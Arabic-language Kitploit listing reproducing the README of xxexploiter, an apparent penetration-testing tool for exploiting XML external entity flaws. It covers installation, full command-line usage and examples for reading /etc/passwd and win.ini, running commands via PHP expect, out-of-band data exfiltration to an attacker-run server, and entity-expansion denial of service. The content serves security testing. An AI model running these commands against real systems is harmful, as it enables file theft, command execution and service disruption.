Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xxexploiter — أداة للمساعدة في استغلال ثغرات XXE | Kitploit
أدوات/GitHubGitHub/luisfontes19/xxexploiter
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائي
GitHubluisfontes19/xxexploiter

xxexploiter

أداة للمساعدة في استغلال ثغرات XXE

عرض المستودع
615706منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الموقع الإلكتروني
مشاركة

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

يقوم بإنشاء حمولات XML، ويبدأ تلقائياً خادماً لخدمة DTDs اللازمة أو لاستخراج البيانات.

التثبيت

root@kitploit:~
# install node and npm if you don't have it yet 
npm install -g xxexploiter

البناء والتشغيل من المصدر

هذا تطبيق Node بسيط مكتوب بلغة TypeScript. لذا يمكنك بناؤه كما تبني التطبيقات الأخرى: (قم بتثبيت node و npm أولاً، إذا لم يكن لديك)

root@kitploit:~
npm install
npm run build
# you may need to npm install typescript -g in order for 'npm build' to succeed

يمكنك تشغيل التطبيق بإحدى ثلاث طرق:

root@kitploit:~
npm start [args]
node dist/index.js [args]
npm link # and now just call xxexploiter

أو يمكنك تثبيته على نظامك:

root@kitploit:~
npm link

الاستخدام

root@kitploit:~
Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

أمثلة

إنشاء حمولة بسيطة

asciicast

أتمتة الطلب لإرسال الحمولة

asciicast

استخراج OOB مع طلب آلي

asciicast

التفحيم (Fuzzing)

asciicast

بعض الملاحظات:

إذا اخترت استخدام وضع OOB أو CDATA، فسيقوم XXExploiter بإنشاء dtd اللازم لإدراجه، وسيبدأ خادماً لاستضافته. ضع في اعتبارك أنه إذا استخدمت هذه الخيارات، يجب عليك تعيين عنوان الخادم.

إذا قمت بتضمين محتوى في نص XML، فضع في اعتبارك أن الأحرف المقيدة في XML مثل '<' قد تعطل التحليل، لذا تأكد من استخدام CDATA أو تشفير base64 الخاص بـ PHP.

معظم اللغات تحد من عدد توسعات الكيانات، أو الطول الإجمالي للمحتوى الموسع، لذا تأكد من اختبار XEE على جهازك أولاً، بنفس ظروف الهدف.

تنزيل الأداة